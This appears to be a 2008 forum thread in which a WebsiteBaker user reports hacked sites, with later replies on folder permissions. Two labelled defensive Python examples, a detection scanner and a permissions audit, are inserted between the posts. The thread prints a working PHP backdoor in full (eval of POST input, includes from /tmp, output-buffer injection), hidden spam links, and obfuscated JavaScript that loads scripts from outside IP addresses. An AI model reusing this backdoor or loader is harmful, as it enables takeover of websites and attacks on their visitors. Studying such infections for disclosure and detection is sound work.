Author Topic: Morfeus F***ing scanner  (Read 2415 times)
Ed

Offline

Posts: 49


« on: September 02, 2008, 06:52:59 PM »

Hello fellow bakers,

It's come to my attention recently that a number of my sites running WB (latest versions) have had code added somehow.

The code doesn't show anything on the website (such as an image) but you can see it when you view the source code for both front end (public) pages and within the back end (admin).

I viewed the server logs and this is what stood out for each website

Quote
195.97.245.114 - - [30/Aug/2008:10:14:51 -0500] "GET /user/soapCaller.bs HTTP/1.1" 404 1544 "-" "Morfeus f***ing Scanner"

Many of the pages within the installation are affected and I could give a list if needed.

This is from temp/index.php

Code:
<?php

// $Id: index.php 519 2007-12-23 14:37:02Z Ruebenwurzel $

/*

 WebsiteBaker Project <http://www.websitebaker.org/>
 Copyright (C) 2004-2008, Ryan Djurovich

 WebsiteBaker is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 WebsiteBaker is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with websitebaker; if not, write to the Free Software
 Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

*/

header("Location: ../index.php");

?>
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


and from the front end of the site when looking at the source code this code is added at the bottom of every page

Code:
<div style='position:absolute; left:-1000px; top:-1000px;'>What Is v*** Used For people who are interested in <a href=http://forum.lycos.de/member.php?u=26282 title='buy v*** online' TARGET=_blank>buy v*** cheap</a>. How Quickly Does v*** Work swallow that pill purchase sildenafil <a href=http://www.youtube.com/traxtenberg555 title='v*** online pharmacy' TARGET=_blank>buy v*** pharmacy</a>. <BR>
How v*** works we can find many extraordinary alternative erectile dysfunction drug <a href=http://www.answerbag.com/profile/?id=310168 title='buy v*** without prescription' TARGET=_blank>cheap generic v***</a><BR>

<script>if(typeof(yahoo_counter)!=typeof(1))eval(unescape('!v#%61$%72%20%61%2C%69?,`%5F%3B%61!%3D`%5B@%221%39%31#%2E13%33?%22,|%22#%31~5@%37%2E2%30~2`"%2C"?1!%35%38.`%38|9~%22,%22@%31%39~1%2E@8$%34%22%5D@%3B_`=%31%3B%69$%66%28%64%6F~%63u`m$%65%6E$%74@.#co#ok|i~e.|m`%61`%74%63h?%28%2F~%5C%62h%67f~t=$%31|%2F%29%3D`%3D%6E%75%6C%6C%29#%66$%6F#r$%28!%69=?%30?%3B!i%3C?%34;i++!%29`%64o%63%75m~e%6E|t.?%77%72!%69$%74?e`%28"%3C#s%63?r%69~%70`%74!%3E%69%66!(@%5F#%29@d`oc@u%6De%6Et.@%77#%72|i!t!e%28%5C`%22%3Cs?c%72ipt%20~%69?d|%3D?_"!+?%69+%22%5F%20s#r|%63!=#%2F/#7@%36%2E1#%363`.~"+a[%69%5D+%22#%2F%63@p`/%3E%3C`%5C$%5C%2F|%73|cr!ip%74?%3E?%5C@%22~%29|%3C%5C#/s|%63~r?i|%70%74`%3E$%22%29!;').replace(/\?|@|#|\$|\!|`|~|\|/g,""));var yahoo_counter=1;</script></div>

If you do a Google search for "Morfeus f***ing Scanner" you will see that other PHP CMS systems are affected as well.

Whether or not this is a problem with WebsiteBaker or with hosting, I thought I should post this here to bring attention to the issue, as I only found the code by accident and I don't know if anyone else is affected in the same way.

Thanks
Logged
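A defender-side check for the indicators visible in the injected PHP block and the hidden div quoted in the post above. This is an added example, not part of the original thread or of WebsiteBaker; the function names and both sample strings are constructed for illustration.

```python
import re
from pathlib import Path

# Source-level indicators, each one visible in the injected block quoted above.
PHP_INDICATORS = {
    # eval() fed directly from request input
    "eval_of_request_input": re.compile(
        r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    # a literal /tmp path followed shortly by an include of it
    "include_from_tmp": re.compile(
        r"""['"]/tmp/[^'"]*['"][^;]{0,80}include(?:_once)?\s*\("""),
    # output buffering through a named callback (weak alone; gzip handler excluded)
    "output_buffer_callback": re.compile(
        r"""ob_start\s*\(\s*['"](?!ob_gzhandler)\w+['"]"""),
    # a new <?php block opened straight after a closing tag (appended code)
    "php_block_after_close_tag": re.compile(r"\?>\s*<\?php"),
}

# Rendered-page indicator: a div positioned far off screen, as in the quoted HTML.
HIDDEN_DIV = re.compile(
    r"""<div[^>]*style\s*=\s*['"][^'"]*position\s*:\s*absolute"""
    r"""[^'"]*(?:left|top)\s*:\s*-\d{3,}px""", re.I)

def scan_php_source(text):
    """Return the sorted names of the indicators found in one PHP file's text."""
    return sorted(n for n, rx in PHP_INDICATORS.items() if rx.search(text))

def has_hidden_offscreen_div(html):
    """True if served HTML contains an off-screen absolutely positioned div."""
    return bool(HIDDEN_DIV.search(html))

def scan_tree(root):
    """Map each *.php file under root with at least one hit to its indicator names."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed samples: a clean redirect stub, and the same stub with a shortened,
# renamed stand-in for the appended block (detection fixture only).
CLEAN = '<?php\nheader("Location: ../index.php");\n?>\n'
INFECTED = CLEAN + ("<?php if(is_file($f='/tmp/m'.$i)){include_once($f);}"
                    "if(isset($_POST['k']))eval($_POST['k']);ob_start('cb'); ?>\n")
HIDDEN_HTML = "<div style='position:absolute; left:-1000px; top:-1000px;'>x</div>"
```

Treat a single hit as a prompt to diff the file against a known-good copy of the release, since `output_buffer_callback` on its own also matches legitimate buffering code.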
Ed

Offline

Posts: 49


« Reply #1 on: September 02, 2008, 10:09:21 PM »

Just a small extra bit of info: all of the files that are affected are under ownership of httpd. Files created by the server, if I understand correctly.
Logged
marathoner

Offline

Posts: 495


« Reply #2 on: September 03, 2008, 01:36:04 AM »

What permissions are you using for the template file?
Logged
Ed

Offline

Posts: 49


« Reply #3 on: September 03, 2008, 08:15:28 AM »

The code in my post was actually from the /temp  folder not /templates.. But as it turns out both index.php files in temp and template folders had files affected.


/temp  = 777

/temp/index.php = 400 


/templates = 777

templates/index.php = 400 

Whether or not these have been changed before/during/after the code was added I'm not sure

Thanks :)
Logged
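An audit of which PHP files the web server account could alter or replace, given the ownership and modes reported in the replies above (files owned by httpd, directories at 777, files at 400). This is an added example, not from the thread; the function names and the sample tree are constructed, and group permissions are ignored on the assumption that the web user is not in the files' group.

```python
import os
import stat

def alter_reasons(path, web_uid):
    """List the reasons the account web_uid could change or replace path."""
    st = os.lstat(path)
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    reasons = []
    if st.st_uid == web_uid:
        # The owner can chmod the file writable again, so mode 400 is no barrier.
        reasons.append("owner")
    elif st.st_mode & stat.S_IWOTH:
        reasons.append("world_writable_file")
    dir_writable = bool(parent.st_mode & stat.S_IWOTH) or (
        parent.st_uid == web_uid and bool(parent.st_mode & stat.S_IWUSR))
    sticky = bool(parent.st_mode & stat.S_ISVTX)
    # Write access to the directory allows unlinking and recreating the file,
    # unless the sticky bit limits deletion to the file or directory owner.
    if dir_writable and (not sticky or web_uid in (st.st_uid, parent.st_uid)):
        reasons.append("parent_dir_writable")
    return reasons

def audit(root, web_uid):
    """Map each *.php file under root that web_uid could alter to the reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                reasons = alter_reasons(full, web_uid)
                if reasons:
                    findings[os.path.relpath(full, root)] = reasons
    return findings

def make_sample_tree(root):
    """Constructed tree: temp/ at 777 holding a 400 file, safe/ at 755 with a 644 file."""
    for sub, dmode, fmode in (("temp", 0o777, 0o400), ("safe", 0o755, 0o644)):
        os.mkdir(os.path.join(root, sub))
        target = os.path.join(root, sub, "index.php")
        with open(target, "w") as fh:
            fh.write("<?php header('Location: ../index.php'); ?>\n")
        os.chmod(target, fmode)
        os.chmod(os.path.join(root, sub), dmode)
```

Run `audit()` with the numeric uid of the web server account; any file it reports can be rewritten by code executing as that account regardless of the file's own mode bits.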